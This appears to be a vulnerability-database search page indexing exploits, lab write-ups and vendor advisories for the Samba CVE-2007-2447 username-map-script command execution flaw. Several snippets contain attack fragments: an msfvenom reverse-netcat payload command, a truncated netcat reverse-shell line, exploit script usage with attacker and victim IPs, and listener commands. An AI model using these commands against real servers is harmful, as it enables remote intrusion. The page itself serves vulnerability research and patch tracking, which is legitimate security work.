Lucene search
+L

21 matches found

Kitploit
Kitploit
added 2026/09/17 3:58 a.m.7 views

CVE-2007-2447

ExploitDev Journey 6 | CVE-2007-2447 | Samba 3.0.20 3.0.25rc 'Username' map script' Command Execution Original Exploit: https://www.exploit-db.com/exploits/16320 Exploit name: Samba username map script RCE CVE : 2007-2447 Lab : Lame - HackTheBox Description There is a vulnerability in Samba...

6CVSS8.2AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/16 6:50 p.m.5 views

CVE-2007-2447_Samba_3.0.25rc3

CVE-2007-2447 'Username' map script' Command Execution 3.0.0 - 3.0.25rc3 3.0.20 - 3.0.25rc3 AMRIUNIX...

6CVSS8.2AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/16 12:36 p.m.9 views

smb-usermap

Samba "username map script" 命令执行 该模块利用了 Samba 3.0.20 至 3.0.25rc3 版本中,在使用非默认的 "username map script" 配置选项时存在的命令执行漏洞。通过指定包含 shell 元字符的用户名,攻击者可以执行任意命令。由于该选项用于在认证之前映射用户名,因此利用此漏洞无需认证! 1. 创建 Shellcode root@kitploit: msfvenom -p cmd/unix/reversenetcat LHOST=10.10.14.56 LPORT=5555 -f python 2. Netcat 监听器...

6.5AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/16 10:38 a.m.7 views

PyUsernameMapScriptRCE

PyUsernameMapScriptRCE CVE-2007-2447 用Python编写的漏洞利用程序,用于获取反向shell...

6CVSS8.2AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/16 2:55 a.m.10 views

Samba-Exploit-CVE-2007-2447

🎬 This YouTube video 1️⃣ Scanning the target Nmap root@kitploit: nmap -sS -sV -p 139,445 192.168.56.102 Expected result: 139/tcp open netbios-ssn Samba smbd 3.X 445/tcp open microsoft-ds Samba smbd 3.0.20-Debian 👉 Samba version: 3.0.20 This is vulnerable to CVE-2007-2447. 2️⃣ Identifying the Samba...

6CVSS8.3AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/16 2:36 a.m.6 views

CVE-2007-2447

CVE-2007-2447 - Samba 3.0.20 &1|nc 10.0.0.1 4242 /tmp/f 用法 root@kitploit: 利用目标 10.129.232.46 的 445 端口,向 10.10.14.82 的 443 端口发送反弹 shell python3 CVE-2007-2447.py --rhost 10.129.232.46 --lhost 10.10.14.82 使用自定义远程端口和本地端口 python3 CVE-2007-2447.py --rhost 10.129.232.46 --rport 4445 --lhost 10.10.14.82...

6CVSS8.4AI score0.49759EPSS
SaveExploits18References1
Kitploit
Kitploit
added 2026/09/16 2:03 a.m.5 views

Samba-CVE-2007-2447-Exploit

Samba CVE-2007-2447 漏洞利用 这是一个用于利用 CVE-2007-2447 的 Python 脚本,该漏洞是 Samba 服务器中的“用户名”映射脚本命令执行漏洞。 描述 此漏洞利用程序针对 Samba 版本 3.x - 4.x。CVE-2007-2447 允许攻击者通过构造恶意的用户名和密码在易受攻击的 Samba 服务器上执行任意命令。 使用方法 1. 在你的攻击机上设置监听器,例如使用 Netcat:nc -nvlp 1234 2. 运行 Python 脚本并提供所需信息: 你的 IP(用于传递反向 shell) 受害者 IP 受害者端口 3. 脚本将构建反向...

6CVSS8.5AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/13 11:25 p.m.6 views

Samba-CVE-2007-2447-Exploit-Username-Map-Script

Samba CVE-2007-2447 利用工具 用户映射脚本 此仓库包含一个 Python 脚本,用于自动化利用 Samba 服务器(版本 3.0.20 至 3.0.25rc3)中的 CVE-2007-2447 漏洞。该工具仅用于 教育 目的和授权的渗透测试。 📝 技术学术描述 “用户映射脚本” 漏洞是由于当 Samba 配置中启用了 username map script 选项时,未对用户名输入进行清理所致。当发送包含 shell 元字符(如反引号 或子 shell $)的用户名时,服务器会以服务权限(通常是 root)执行这些命令。 🚀 要求 操作系统: Kali Linux /...

6CVSS7.8AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/12 10:52 a.m.7 views

CVE-2007-2447

CVE-2007-2447 - username map script "The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the 1 SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows...

6CVSS8.7AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/11 2:58 p.m.7 views

metasploitable-pentest-lab

Metasploitable 中的漏洞利用 在受控且隔离的环境中完成一次真实攻击的完整流程:实验室准备、nmap 侦察、攻击面优先级排序、CVE 映射、Metasploit 漏洞利用、后渗透、凭据提取与破解,以及通过 SSH 密钥注入实现持久化。 1. 环境准备 攻击方 :Kali Linux——msfconsole、nmap、John the Ripper。 目标 :Metasploitable 1——Ubuntu 8.04(2010 年),未打补丁,存在多个已知 CVE。 网络 :host-only,两台 VM 与任何真实网络隔离(192.168.64.0/24)。受害机...

6CVSS8.5AI score0.49759EPSS
SaveExploits18References1
GithubExploit
GithubExploit
added 2026/04/17 7:48 p.m.157 views

Exploit for CVE-2007-2447

Samba CVE-2007-2447 Exploit Username Map Script Este reposi...

6CVSS7.3AI score0.49759EPSS
SaveExploits18
GithubExploit
GithubExploit
added 2026/04/17 7:48 p.m.126 views

Exploit for CVE-2007-2447

Samba-CVE-2007-244...

6CVSS5.7AI score0.49759EPSS
SaveExploits18
GithubExploit
GithubExploit
added 2026/04/07 1:48 a.m.143 views

Exploit for CVE-2007-2447

SMB Samba Exploitation Metasploitable 2 📌 Overview This...

6CVSS7.3AI score0.49759EPSS
SaveExploits18
SUSE CVE
SUSE CVE
added 2023/02/15 6:12 a.m.10 views

SUSE CVE-2007-2447

The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the 1 SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute...

6CVSS7.6AI score0.49759EPSS
SaveExploits18References7
RedHat Linux
RedHat Linux
added 2022/01/31 4:42 p.m.99 views

Critical: Red Hat Security Advisory: samba security and bug fix update

An update for samba is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from the...

9CVSS7.4AI score0.73864EPSS
SaveExploits1References4
AlmaLinux
AlmaLinux
added 2022/01/31 3:40 p.m.66 views

Critical: samba security and bug fix update

Samba is an open-source implementation of the Server Message Block SMB protocol and the related Common Internet File System CIFS protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fixes: samba: Out-of-bounds heap read/write vulnerability in VF...

9CVSS9.1AI score0.73864EPSS
SaveExploits1References1
OSV
OSV
added 2022/01/31 3:40 p.m.37 views

RLSA-2022:0332 Critical: samba security and bug fix update

Samba is an open-source implementation of the Server Message Block SMB protocol and the related Common Internet File System CIFS protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fixes: samba: Out-of-bounds heap read/write vulnerability in VF...

9.9CVSS8AI score0.73864EPSS
SaveExploits1References4
Tenable Nessus
Tenable Nessus
added 2012/08/01 12:00 a.m.49 views

Scientific Linux Security Update : samba on SL5.x, SL4.x, SL3.x i386/x86_64

Various bugs were found in NDR parsing, used to decode MS-RPC requests in Samba. A remote attacker could have sent carefully crafted requests causing a heap overflow, which may have led to the ability to execute arbitrary code on the server. CVE-2007-2446 Unescaped user input parameters were bein...

10CVSS8.5AI score0.77305EPSS
SaveExploits40References3
Prion
Prion
added 2007/05/14 9:19 p.m.38 views

Code injection

The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the 1 SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute...

6CVSS7.1AI score0.49759EPSS
SaveExploits18References55Affected Software1
OSV
OSV
added 2007/05/14 9:19 p.m.13 views

DEBIAN-CVE-2007-2447

The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the 1 SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute...

6CVSS9.3AI score0.49759EPSS
SaveExploits18References1
Rows per page
Query Builder